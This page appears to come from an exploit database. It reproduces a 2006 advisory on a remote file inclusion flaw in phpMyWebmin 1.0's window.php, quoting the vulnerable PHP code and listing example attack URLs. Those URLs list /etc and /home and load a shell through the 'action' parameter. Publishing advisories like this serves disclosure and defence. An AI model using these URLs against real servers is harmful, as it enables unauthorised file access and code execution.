[] NeoSense
E X P L O I T S
title author type platform port cve id

phpMyWebmin 1.0 - 'window.php' Remote File Inclusion

Author: Kernel-32
type: webapps
platform: php
port: 
date_added: 2006-09-27 
date_updated: 2016-10-27 
verified: 1 
codes: OSVDB-29279;CVE-2006-5125;OSVDB-29278;CVE-2006-5124;OSVDB-29277 
tags: 
aliases:  
screenshot_url:  
application_url: 
#######################################
+PHP MyWebMin 1.0 Remote File Include
+Advisory #5
+Product :PHP MyWebMin
+Develop:
+www.josh.ch/joshch/php-tools/phpmywebmin,download.html
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################

Vulnerable File:window.php
$ordner = opendir("$target");
?>

and

include("$target/preferences.php");

if($action != "")
{
include("$action.php");
?>

Examples:
http://site/path/window.php?target=/etc
http://site/path/home.php?target=/home
http://site/path/window.php?action=Shell.php

# milw0rm.com [2006-09-28]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.